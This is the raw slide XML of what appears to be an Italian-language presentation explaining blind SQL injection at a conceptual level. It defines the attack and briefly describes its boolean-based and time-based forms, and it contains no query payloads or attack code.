            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="5545675" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9276005" y="0"/>
            <a:ext cx="4510760" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6014346" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 4" id="4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="29293" t="0" r="46041" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6014346" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13777240" y="0"/>
            <a:ext cx="4510760" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6014346" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 6" id="6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="54181" t="0" r="16549" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6014346" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1145500" y="9595504"/>
            <a:ext cx="1379782" cy="197971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">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1" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925"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15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 13" id="13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8884990" y="9390705"/>
            <a:ext cx="782032" cy="1028700"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="731937"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 14" id="14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="731937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="731937" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="731937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="731937"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="760512"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13395749" y="0"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="1224391"/>
            <a:ext cx="6733192" cy="1793990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4778"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3413">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>iniezione SQL Blind (Blind SQL Injection) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="3018381"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="4425162"/>
            <a:ext cx="6917593" cy="2119554"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="586417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1913890" cy="586417"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="586417" w="1913890">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="586417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586417"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="633586" y="4452994"/>
            <a:ext cx="6690271" cy="2048614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2059"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1470">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>L'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1470">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>iniezione SQL Blind (Blind SQL Injection)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1470">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> è un tipo di attacco SQL Injection in cui l'attaccante non può vedere direttamente i risultati della query SQL malevola che viene eseguita. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2059"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1470">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Tuttavia, può dedurre le informazioni dal comportamento dell'applicazione. Questo tipo di attacco è utilizzato quando le applicazioni web mascherano i messaggi di errore del database, rendendo difficile l'ottenimento diretto di informazioni, ma il comportamento dell'applicazione può ancora essere sfruttato per estrapolare dati sensibili.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 26" id="26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="6639966"/>
            <a:ext cx="6917593" cy="2836228"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="784699"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 27" id="27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1913890" cy="784699"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="784699" w="1913890">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="784699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="784699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="633586" y="6673540"/>
            <a:ext cx="6690271" cy="2717165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Tipi di Iniezione SQL Blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Blind Based on Boolean:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>In questo metodo, l'attaccante invia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> delle query SQL che forzano l'applicazione a restituire un risultato vero o falso (booleano). Basandosi su queste risposte, l'attaccante può dedurre informazioni sui dati nel database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Blind Based on Time:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questo metodo sfrutta le funzioni di ritardo del database per determinare la veridicità di una condizione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Se la condizione è vera, il database ritarda la risposta, altrimenti risponde immediatamente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 29" id="29"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="451518" y="3155418"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="535840" y="4023387"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="3450395"/>
            <a:ext cx="7794161" cy="543884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2213"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1581" spc="542">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 32" id="32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="4048370"/>
            <a:ext cx="7794161" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5545675" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 33" id="33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="5545675" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="5545675">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 34" id="34"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="5545675" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 35" id="35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="3295221"/>
            <a:ext cx="7794161" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5545675" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 36" id="36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="5545675" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="5545675">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 37" id="37"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="5545675" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308384" y="1835644"/>
            <a:ext cx="8240918" cy="6615711"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2024778" cy="1625468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2024778" cy="1625468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
